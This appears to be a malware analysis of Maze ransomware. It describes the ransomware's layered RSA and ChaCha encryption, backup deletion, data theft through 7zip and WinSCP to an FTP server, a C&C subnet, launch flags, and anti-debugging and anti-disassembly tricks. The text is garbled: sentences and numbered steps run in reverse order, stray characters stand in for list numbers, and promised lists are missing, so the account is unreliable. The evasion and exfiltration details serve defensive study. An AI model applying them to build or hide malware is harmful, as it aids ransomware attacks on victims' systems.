Maze imports the Master RSA-2048 public key hardcoded in the binary. The encrypted Session RSA private key is then stored in the ransom note. Encryption of the Session RSA private key with the Master RSA public key. File keys and IV are encrypted with the Session RSA public key and added to the encrypted files.ģ. File encryption with ChaCha symmetric crypto algorithm.Ģ. The encryption scheme has three layers that use file, session, and master keys.ġ.
Maze deletes Windows file backups using the following obfuscated command line: In some incidents, it was reported that the exfiltrated data was also Base64 encoded. It uses the 7zip utility to pack collected data and exfiltrate archives to the attacker’s FTP server using a WinSCP client. Maze ransomware – similar to the recent ransomware attacks from WastedLocker, Netwalker, and Revil – both encrypts and steals data. The subnet 91.218.114.0 is often used by the Maze cartel. The IP addresses are located in Moscow, Russian Federation. The list of hardcoded strings that Maze uses to construct network requests is below.
Once executed, Maze sends a check-in request to the C&C servers. The ransomware also creates Mutex with a unique ID created for the current user to check if a second instance of the Maze ransomware is running. It checks for the ‘419’ value when it retrieves system language from the registry using GetUserDefaultUILanguage. Maze ransomware does not encrypt files on systems with Russian localization. -path indicates a directory that will be encrypted.-noshares disables encryption for network shares.-nomutex allows it to run many copies of Maze ransomware.-logging enables the console output to log the ransomware’s activity.The Maze ransomware can be launched with additional parameters:
If antivirus software is found, it does not run the payload. Maze also gets information about the antivirus products installed using WMI. The reconstructed list of the processes is as follows:
If so, the code goes into an infinite loop and does no encryption.Īlso, Maze kills the processes of the malware analysis tools and office tools by the hashes of the process names.įor example, x32dbg has a hash value of ‘5062053B’. It checks the flag ‘BeingDebugged’ in its PEB structure, if the process is run under debugger. In addition, Maze can detect if its code is being debugged. After executing the function it cleans up the stack and retrieves the return address from the stack to leave the function. The fifth and sixth jumps can be seen as absolute jumps.Īs for the second anti-disassembly technique, Maze pushes the function return address to the stack and then jumps to the function itself. If the first jump is passed, the second jump is taken, because it is opposite to the previous one and code goes to the 42199F location and the third jump is unreachable.If the first jump is taken, execution goes to the 421E6D location, where the fourth jump is taken as ZF flag was not changed and execution goes to the 42199F location and code under the jump is unreachable.The result of this piece of code is jumping to the 42199F location.
Let's take a look at the first anti-disassembly technique.